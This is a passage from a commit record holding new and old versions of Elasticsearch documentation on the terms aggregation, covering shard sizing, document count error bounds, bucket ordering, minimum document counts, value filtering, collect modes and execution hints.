view of what the ordered list of terms should be and these are\ncombined to give a final view. Consider the following scenario:\n\nA request is made to obtain the top 5 terms in the field product, ordered by descending document count from an index with\n3 shards. In this case each shard is asked to give its top 5 terms.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5\n }\n }\n }\n}\n--------------------------------------------------\n\nThe terms for each of the three shards are shown below with their\nrespective document counts in brackets:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n| 6 | Product F (2) | Product H (14) | Product H (28)\n| 7 | Product G (2) | Product I (10) | Product Q (2)\n| 8 | Product H (2) | Product Q (6) | Product D (1)\n| 9 | Product I (1) | Product J (8) |\n| 10 | Product J (1) | Product C (4) |\n\n|=========================================================\n\nThe shards will return their top 5 terms so the results from the shards will be:\n\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n\n|=========================================================\n\nTaking the top 5 results from each of the shards (as requested) and combining them to make a final top 5 list produces\nthe following:\n\n[width=\"40%\",cols=\"^2,^2\"]\n|=========================================================\n\n| 1 | Product A (100)\n| 2 | Product Z (52)\n| 3 | Product C (50)\n| 4 | Product G (45)\n| 5 | Product B (43)\n\n|=========================================================\n\nBecause Product A was returned from all shards we know that its document count value is accurate. Product C was only\nreturned by shards A and C so its document count is shown as 50 but this is not an accurate count. Product C exists on\nshard B, but its count of 4 was not high enough to put Product C into the top 5 list for that shard. Product Z was also\nreturned only by 2 shards but the third shard does not contain the term. There is no way of knowing, at the point of\ncombining the results to produce the final list of terms, that there is an error in the document count for Product C and\nnot for Product Z. Product H has a document count of 44 across all 3 shards but was not included in the final list of\nterms because it did not make it into the top five terms on any of the shards.\n\n==== Shard Size\n\nThe higher the requested `size` is, the more accurate the results will be, but also, the more expensive it will be to\ncompute the final results (both due to bigger priority queues that are managed on a shard level and due to bigger data\ntransfers between the nodes and the client).\n\nThe `shard_size` parameter can be used to minimize the extra work that comes with bigger requested `size`. When defined,\nit will determine how many terms the coordinating node will request from each shard. Once all the shards responded, the\ncoordinating node will then reduce them to a final result which will be based on the `size` parameter - this way,\none can increase the accuracy of the returned terms and avoid the overhead of streaming a big list of buckets back to\nthe client. If set to `0`, the `shard_size` will be set to `Integer.MAX_VALUE`.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, elasticsearch will\n override it and reset it to be equal to `size`.\n\nadded[1.1.0] It is possible to not limit the number of terms that are returned by setting `size` to `0`. Don't use this\non high-cardinality fields as this will kill both your CPU since terms need to be return sorted, and your network.\n\n==== Calculating Document Count Error\n\ncoming[1.4.0]\n\nThere are two error values which can be shown on the terms aggregation. The first gives a value for the aggregation as\na whole which represents the maximum potential document count for a term which did not make it into the final list of\nterms. This is calculated as the sum of the document count from the last term returned from each shard .For the example\ngiven above the value would be 46 (2 + 15 + 29). This means that in the worst case scenario a term which was not returned\ncould have the 4th highest document count.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52\n },\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\nThe second error value can be enabled by setting the `show_term_doc_count_error` parameter to true. This shows an error value\nfor each term returned by the aggregation which represents the 'worst case' error in the document count and can be useful when\ndeciding on a value for the `shard_size` parameter. This is calculated by summing the document counts for the last term returned\nby all shards which did not return the term. In the example above the error in the document count for Product C would be 15 as\nShard B was the only shard not to return the term and the document count of the last termit did return was 15. The actual document\ncount of Product C was 54 so the document count was only actually off by 4 even though the worst case was that it would be off by\n15. Product A, however has an error of 0 for its document count, since every shard returned it we can be confident that the count\nreturned is accurate.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100,\n \"doc_count_error_upper_bound\" : 0\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52,\n \"doc_count_error_upper_bound\" : 2\n },\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\nThese errors can only be calculated in this way when the terms are ordered by descending document count. When the aggregation is\nordered by the terms values themselves (either ascending or descending) there is no error in the document count since if a shard\ndoes not return a particular term which appears in the results from another shard, it must not have that term in its index. When the\naggregation is either sorted by a sub aggregation or in order of ascending document count, the error in the document counts cannot be\ndetermined and is given a value of -1 to indicate this.\n\n==== Order\n\nThe order of the buckets can be customized by setting the `order` parameter. By default, the buckets are ordered by\ntheir `doc_count` descending. It is also possible to change this behaviour as follows:\n\nOrdering the buckets by their `doc_count` in an ascending manner:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"_count\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\nOrdering the buckets alphabetically by their terms in an ascending manner:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"_term\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\n\nOrdering the buckets by single value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"avg_height\" : \"desc\" }\n },\n \"aggs\" : {\n \"avg_height\" : { \"avg\" : { \"field\" : \"height\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\nOrdering the buckets by multi value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"height_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"height_stats\" : { \"stats\" : { \"field\" : \"height\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\nIt is also possible to order the buckets based on a \"deeper\" aggregation in the hierarchy. This is supported as long\nas the aggregations path are of a single-bucket type, where the last aggregation in the path may either by a single-bucket\none or a metrics one. If it's a single-bucket type, the order will be defined by the number of docs in the bucket (i.e. `doc_count`),\nin case it's a metrics one, the same rules as above apply (where the path must indicate the metric name to sort by in case of\na multi-value metrics aggregation, and in case of a single-value metrics aggregation the sort will be applied on that value).\n\nThe path must be defined in the following form:\n\n--------------------------------------------------\nAGG_SEPARATOR := '>'\nMETRIC_SEPARATOR := '.'\nAGG_NAME := <the name of the aggregation>\nMETRIC := <the name of the metric (in case of multi-value metrics aggregation)>\nPATH := <AGG_NAME>[<AGG_SEPARATOR><AGG_NAME>]*[<METRIC_SEPARATOR><METRIC>]\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"address.country\",\n \"order\" : { \"females>height_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"females\" : {\n \"filter\" : { \"term\" : { \"gender\" : { \"female\" }}},\n \"aggs\" : {\n \"height_stats\" : { \"stats\" : { \"field\" : \"height\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above will sort the countries buckets based on the average height among the female population.\n\n==== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tag\",\n \"min_doc_count\": 10\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above aggregation would only return tags which have been found in 10 hits or more. Default value is `1`.\n\n\nTerms are collected and ordered on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global document count available. The decision if a term is added to a candidate list depends only on the order computed on the shard using local shard frequencies. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic.\n\nadded[1.2.0] `shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low frequent terms and you are not interested in those (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty not reach the required `min_doc_count` even after merging the local counts. `shard_min_doc_count` is set to `0` per default and has no effect unless you explicitly set it.\n\n\n\nNOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. However, some of\n the returned terms which have a document count of zero might only belong to deleted documents, so there is\n no warranty that a `match_all` query would find a positive document count for those terms.\n\nWARNING: When NOT sorting on `doc_count` descending, high values of `min_doc_count` may return a number of buckets\n which is less than `size` because not enough data was gathered from the shards. Missing buckets can be\n back by increasing `shard_size`.\n Setting `shard_min_doc_count` too high will cause terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count\/#shards`.\n\n[[search-aggregations-bucket-terms-aggregation-script]]\n==== Script\n\nGenerating the terms using a script:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"script\" : \"doc['gender'].value\"\n }\n }\n }\n}\n--------------------------------------------------\n\n==== Value Script\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"script\" : \"'Gender: ' +_value\"\n }\n }\n }\n}\n--------------------------------------------------\n\n\n==== Filtering Values\n\nIt is possible to filter the values for which buckets will be created. This can be done using the `include` and\n`exclude` parameters which are based on regular expressions.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : \".*sport.*\",\n \"exclude\" : \"water_.*\"\n }\n }\n }\n}\n--------------------------------------------------\n\nIn the above example, buckets will be created for all the tags that has the word `sport` in them, except those starting\nwith `water_` (so the tag `water_sports` will no be aggregated). The `include` regular expression will determine what\nvalues are \"allowed\" to be aggregated, while the `exclude` determines the values that should not be aggregated. When\nboth are defined, the `exclude` has precedence, meaning, the `include` is evaluated first and only then the `exclude`.\n\nThe regular expression are based on the Java(TM) http:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html[Pattern],\nand as such, they it is also possible to pass in flags that will determine how the compiled regular expression will work:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"include\" : {\n \"pattern\" : \".*sport.*\",\n \"flags\" : \"CANON_EQ|CASE_INSENSITIVE\" <1>\n },\n \"exclude\" : {\n \"pattern\" : \"water_.*\",\n \"flags\" : \"CANON_EQ|CASE_INSENSITIVE\"\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> the flags are concatenated using the `|` character as a separator\n\nThe possible flags that can be used are:\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#CANON_EQ[`CANON_EQ`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#CASE_INSENSITIVE[`CASE_INSENSITIVE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#COMMENTS[`COMMENTS`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#DOTALL[`DOTALL`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#LITERAL[`LITERAL`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#MULTILINE[`MULTILINE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNICODE_CASE[`UNICODE_CASE`],\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNICODE_CHARACTER_CLASS[`UNICODE_CHARACTER_CLASS`] and\nhttp:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html#UNIX_LINES[`UNIX_LINES`]\n\n==== Multi-field terms aggregation\n\nThe `terms` aggregation does not support collecting terms from multiple fields\nin the same document. The reason is that the `terms` agg doesn't collect the\nstring term values themselves, but rather uses\n<<search-aggregations-bucket-terms-aggregation-execution-hint,global ordinals>>\nto produce a list of all of the unique values in the field. Global ordinals\nresults in an important performance boost which would not be possible across\nmultiple fields.\n\nThere are two approaches that you can use to perform a `terms` agg across\nmultiple fields:\n\n<<search-aggregations-bucket-terms-aggregation-script,Script>>::\n\nUse a script to retrieve terms from multiple fields. This disables the global\nordinals optimization and will be slower than collecting terms from a single\nfield, but it gives you the flexibility to implement this option at search\ntime.\n\n<<copy-to,`copy_to` field>>::\n\nIf you know ahead of time that you want to collect the terms from two or more\nfields, then use `copy_to` in your mapping to create a new dedicated field at\nindex time which contains the values from both fields. You can aggregate on\nthis single field, which will benefit from the global ordinals optimization.\n\n==== Collect mode\n\nadded[1.3.0] Deferring calculation of child aggregations\n\nFor fields with many unique terms and a small number of required results it can be more efficient to delay the calculation\nof child aggregations until the top parent-level aggs have been pruned. Ordinarily, all branches of the aggregation tree\nare expanded in one depth-first pass and only then any pruning occurs. In some rare scenarios this can be very wasteful and can hit memory constraints.\nAn example problem scenario is querying a movie database for the 10 most popular actors and their 5 most common co-stars:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nEven though the number of movies may be comparatively small and we want only 50 result buckets there is a combinatorial explosion of buckets\nduring calculation - a single movie will produce n\u00b2 buckets where n is the number of actors. The sane option would be to first determine\nthe 10 most popular actors and only then examine the top co-stars for these 10 actors. This alternative strategy is what we call the `breadth_first` collection\nmode as opposed to the default `depth_first` mode:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"actors\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 10,\n \"collect_mode\" : \"breadth_first\"\n },\n \"aggs\" : {\n \"costars\" : {\n \"terms\" : {\n \"field\" : \"actors\",\n \"size\" : 5\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\n\nWhen using `breadth_first` mode the set of documents that fall into the uppermost buckets are\ncached for subsequent replay so there is a memory overhead in doing this which is linear with the number of matching documents.\nIn most requests the volume of buckets generated is smaller than the number of documents that fall into them so the default `depth_first`\ncollection mode is normally the best bet but occasionally the `breadth_first` strategy can be significantly more efficient. Currently\nelasticsearch will always use the `depth_first` collect_mode unless explicitly instructed to use `breadth_first` as in the above example.\nNote that the `order` parameter can still be used to refer to data from a child aggregation when using the `breadth_first` setting - the parent\naggregation understands that this child aggregation will need to be called first before any of the other child aggregations.\n\nWARNING: It is not possible to nest aggregations such as `top_hits` which require access to match score information under an aggregation that uses\nthe `breadth_first` collection mode. This is because this would require a RAM buffer to hold the float score value for every document and\nthis would typically be too costly in terms of RAM.\n\n[[search-aggregations-bucket-terms-aggregation-execution-hint]]\n==== Execution hint\n\nadded[1.2.0] Added the `global_ordinals`, `global_ordinals_hash` and `global_ordinals_low_cardinality` execution modes\n\ndeprecated[1.3.0] Removed the `ordinals` execution mode\n\nThere are different mechanisms by which terms aggregations can be executed:\n\n - by using field values directly in order to aggregate data per-bucket (`map`)\n - by using ordinals of the field and preemptively allocating one bucket per ordinal value (`global_ordinals`)\n - by using ordinals of the field and dynamically allocating one bucket per ordinal value (`global_ordinals_hash`)\n - by using per-segment ordinals to compute counts and remap these counts to global counts using global ordinals (`global_ordinals_low_cardinality`)\n\nElasticsearch tries to have sensible defaults so this is something that generally doesn't need to be configured.\n\n`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution modes\nare significantly faster. By default, `map` is only used when running an aggregation on scripts, since they don't have\nordinals.\n\n`global_ordinals_low_cardinality` only works for leaf terms aggregations but is usually the fastest execution mode. Memory\nusage is linear with the number of unique values in the field, so it is only enabled by default on low-cardinality fields.\n\n`global_ordinals` is the second fastest option, but the fact that it preemptively allocates buckets can be memory-intensive,\nespecially if you have one or more sub aggregations. It is used by default on top-level terms aggregations.\n\n`global_ordinals_hash` on the contrary to `global_ordinals` and `global_ordinals_low_cardinality` allocates buckets dynamically\nso memory usage is linear to the number of values of the documents that are part of the aggregation scope. It is used by default\nin inner aggregations.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tags\",\n \"execution_hint\": \"map\" <1>\n }\n }\n }\n}\n--------------------------------------------------\n\n<1> the possible values are `map`, `global_ordinals`, `global_ordinals_hash` and `global_ordinals_low_cardinality`\n\nPlease note that Elasticsearch will ignore this execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints.\n","old_contents":"[[search-aggregations-bucket-terms-aggregation]]\n=== Terms Aggregation\n\nA multi-bucket value source based aggregation where buckets are dynamically built - one per unique value.\n\nExample:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : { \"field\" : \"gender\" }\n }\n }\n}\n--------------------------------------------------\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"genders\" : {\n \"buckets\" : [\n {\n \"key\" : \"male\",\n \"doc_count\" : 10\n },\n {\n \"key\" : \"female\",\n \"doc_count\" : 10\n },\n ]\n }\n }\n}\n--------------------------------------------------\n\nBy default, the `terms` aggregation will return the buckets for the top ten terms ordered by the `doc_count`. One can\nchange this default behaviour by setting the `size` parameter.\n\n==== Size\n\nThe `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By\ndefault, the node coordinating the search process will request each shard to provide its own top `size` term buckets\nand once all shards respond, it will reduce the results to the final list that will then be returned to the client.\nThis means that if the number of unique terms is greater than `size`, the returned list is slightly off and not accurate\n(it could be that the term counts are slightly off and it could even be that a term that should have been in the top\nsize buckets was not returned). If set to `0`, the `size` will be set to `Integer.MAX_VALUE`.\n\n==== Document counts are approximate\n\nAs described above, the document counts (and the results of any sub aggregations) in the terms aggregation are not always\naccurate. This is because each shard provides its own view of what the ordered list of terms should be and these are\ncombined to give a final view. Consider the following scenario:\n\nA request is made to obtain the top 5 terms in the field product, ordered by descending document count from an index with\n3 shards. In this case each shard is asked to give its top 5 terms.\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"products\" : {\n \"terms\" : {\n \"field\" : \"product\",\n \"size\" : 5\n }\n }\n }\n}\n--------------------------------------------------\n\nThe terms for each of the three shards are shown below with their\nrespective document counts in brackets:\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n| 6 | Product F (2) | Product H (14) | Product H (28)\n| 7 | Product G (2) | Product I (10) | Product Q (2)\n| 8 | Product H (2) | Product Q (6) | Product D (1)\n| 9 | Product I (1) | Product J (8) |\n| 10 | Product J (1) | Product C (4) |\n\n|=========================================================\n\nThe shards will return their top 5 terms so the results from the shards will be:\n\n\n[width=\"100%\",cols=\"^2,^2,^2,^2\",options=\"header\"]\n|=========================================================\n| | Shard A | Shard B | Shard C\n\n| 1 | Product A (25) | Product A (30) | Product A (45)\n| 2 | Product B (18) | Product B (25) | Product C (44)\n| 3 | Product C (6) | Product F (17) | Product Z (36)\n| 4 | Product D (3) | Product Z (16) | Product G (30)\n| 5 | Product E (2) | Product G (15) | Product E (29)\n\n|=========================================================\n\nTaking the top 5 results from each of the shards (as requested) and combining them to make a final top 5 list produces\nthe following:\n\n[width=\"40%\",cols=\"^2,^2\"]\n|=========================================================\n\n| 1 | Product A (100)\n| 2 | Product Z (52)\n| 3 | Product C (50)\n| 4 | Product G (45)\n| 5 | Product B (43)\n\n|=========================================================\n\nBecause Product A was returned from all shards we know that its document count value is accurate. Product C was only\nreturned by shards A and C so its document count is shown as 50 but this is not an accurate count. Product C exists on\nshard B, but its count of 4 was not high enough to put Product C into the top 5 list for that shard. Product Z was also\nreturned only by 2 shards but the third shard does not contain the term. There is no way of knowing, at the point of\ncombining the results to produce the final list of terms, that there is an error in the document count for Product C and\nnot for Product Z. Product H has a document count of 44 across all 3 shards but was not included in the final list of\nterms because it did not make it into the top five terms on any of the shards.\n\n==== Shard Size\n\nThe higher the requested `size` is, the more accurate the results will be, but also, the more expensive it will be to\ncompute the final results (both due to bigger priority queues that are managed on a shard level and due to bigger data\ntransfers between the nodes and the client).\n\nThe `shard_size` parameter can be used to minimize the extra work that comes with bigger requested `size`. When defined,\nit will determine how many terms the coordinating node will request from each shard. Once all the shards responded, the\ncoordinating node will then reduce them to a final result which will be based on the `size` parameter - this way,\none can increase the accuracy of the returned terms and avoid the overhead of streaming a big list of buckets back to\nthe client. If set to `0`, the `shard_size` will be set to `Integer.MAX_VALUE`.\n\n\nNOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, elasticsearch will\n override it and reset it to be equal to `size`.\n\nadded[1.1.0] It is possible to not limit the number of terms that are returned by setting `size` to `0`. Don't use this\non high-cardinality fields as this will kill both your CPU since terms need to be return sorted, and your network.\n\n==== Calculating Document Count Error\n\ncoming[1.4.0]\n\nThere are two error values which can be shown on the terms aggregation. The first gives a value for the aggregation as\na whole which represents the maximum potential document count for a term which did not make it into the final list of\nterms. This is calculated as the sum of the document count from the last term returned from each shard .For the example\ngiven above the value would be 46 (2 + 15 + 29). This means that in the worst case scenario a term which was not returned\ncould have the 4th highest document count.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52\n },\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\nThe second error value can be enabled by setting the `show_term_doc_count_error` parameter to true. This shows an error value\nfor each term returned by the aggregation which represents the 'worst case' error in the document count and can be useful when\ndeciding on a value for the `shard_size` parameter. This is calculated by summing the document counts for the last term returned\nby all shards which did not return the term. In the example above the error in the document count for Product C would be 15 as\nShard B was the only shard not to return the term and the document count of the last termit did return was 15. The actual document\ncount of Product C was 54 so the document count was only actually off by 4 even though the worst case was that it would be off by\n15. Product A, however has an error of 0 for its document count, since every shard returned it we can be confident that the count\nreturned is accurate.\n\n[source,js]\n--------------------------------------------------\n{\n ...\n\n \"aggregations\" : {\n \"products\" : {\n \"doc_count_error_upper_bound\" : 46,\n \"buckets\" : [\n {\n \"key\" : \"Product A\",\n \"doc_count\" : 100,\n \"doc_count_error_upper_bound\" : 0\n },\n {\n \"key\" : \"Product Z\",\n \"doc_count\" : 52,\n \"doc_count_error_upper_bound\" : 2\n },\n ...\n ]\n }\n }\n}\n--------------------------------------------------\n\nThese errors can only be calculated in this way when the terms are ordered by descending document count. When the aggregation is\nordered by the terms values themselves (either ascending or descending) there is no error in the document count since if a shard\ndoes not return a particular term which appears in the results from another shard, it must not have that term in its index. When the\naggregation is either sorted by a sub aggregation or in order of ascending document count, the error in the document counts cannot be\ndetermined and is given a value of -1 to indicate this.\n\n==== Order\n\nThe order of the buckets can be customized by setting the `order` parameter. By default, the buckets are ordered by\ntheir `doc_count` descending. It is also possible to change this behaviour as follows:\n\nOrdering the buckets by their `doc_count` in an ascending manner:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"_count\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\nOrdering the buckets alphabetically by their terms in an ascending manner:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"_term\" : \"asc\" }\n }\n }\n }\n}\n--------------------------------------------------\n\n\nOrdering the buckets by single value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"avg_height\" : \"desc\" }\n },\n \"aggs\" : {\n \"avg_height\" : { \"avg\" : { \"field\" : \"height\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\nOrdering the buckets by multi value metrics sub-aggregation (identified by the aggregation name):\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"field\" : \"gender\",\n \"order\" : { \"height_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"height_stats\" : { \"stats\" : { \"field\" : \"height\" } }\n }\n }\n }\n}\n--------------------------------------------------\n\nIt is also possible to order the buckets based on a \"deeper\" aggregation in the hierarchy. This is supported as long\nas the aggregations path are of a single-bucket type, where the last aggregation in the path may either by a single-bucket\none or a metrics one. If it's a single-bucket type, the order will be defined by the number of docs in the bucket (i.e. `doc_count`),\nin case it's a metrics one, the same rules as above apply (where the path must indicate the metric name to sort by in case of\na multi-value metrics aggregation, and in case of a single-value metrics aggregation the sort will be applied on that value).\n\nThe path must be defined in the following form:\n\n--------------------------------------------------\nAGG_SEPARATOR := '>'\nMETRIC_SEPARATOR := '.'\nAGG_NAME := <the name of the aggregation>\nMETRIC := <the name of the metric (in case of multi-value metrics aggregation)>\nPATH := <AGG_NAME>[<AGG_SEPARATOR><AGG_NAME>]*[<METRIC_SEPARATOR><METRIC>]\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"countries\" : {\n \"terms\" : {\n \"field\" : \"address.country\",\n \"order\" : { \"females>height_stats.avg\" : \"desc\" }\n },\n \"aggs\" : {\n \"females\" : {\n \"filter\" : { \"term\" : { \"gender\" : { \"female\" }}},\n \"aggs\" : {\n \"height_stats\" : { \"stats\" : { \"field\" : \"height\" }}\n }\n }\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above will sort the countries buckets based on the average height among the female population.\n\n==== Minimum document count\n\nIt is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"tags\" : {\n \"terms\" : {\n \"field\" : \"tag\",\n \"min_doc_count\": 10\n }\n }\n }\n}\n--------------------------------------------------\n\nThe above aggregation would only return tags which have been found in 10 hits or more. Default value is `1`.\n\n\nTerms are collected and ordered on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global document count available. The decision if a term is added to a candidate list depends only on the order computed on the shard using local shard frequencies. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic.\n\nadded[1.2.0] `shard_min_doc_count` parameter\n\nThe parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low frequent terms and you are not interested in those (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a resonable certainty not reach the required `min_doc_count` even after merging the local counts. `shard_min_doc_count` is set to `0` per default and has no effect unless you explicitly set it.\n\n\n\nNOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. However, some of\n the returned terms which have a document count of zero might only belong to deleted documents, so there is\n no warranty that a `match_all` query would find a positive document count for those terms.\n\nWARNING: When NOT sorting on `doc_count` descending, high values of `min_doc_count` may return a number of buckets\n which is less than `size` because not enough data was gathered from the shards. Missing buckets can be\n back by increasing `shard_size`.\n Setting `shard_min_doc_count` too high will cause terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count\/#shards`.\n\n[[search-aggregations-bucket-terms-aggregation-script]]\n==== Script\n\nGenerating the terms using a script:\n\n[source,js]\n--------------------------------------------------\n{\n \"aggs\" : {\n \"genders\" : {\n \"terms\" : {\n \"script\" : \"doc['gender'].value\"\n }\n }\n }\n}\n--------------------------------------------------\n\n==== Value 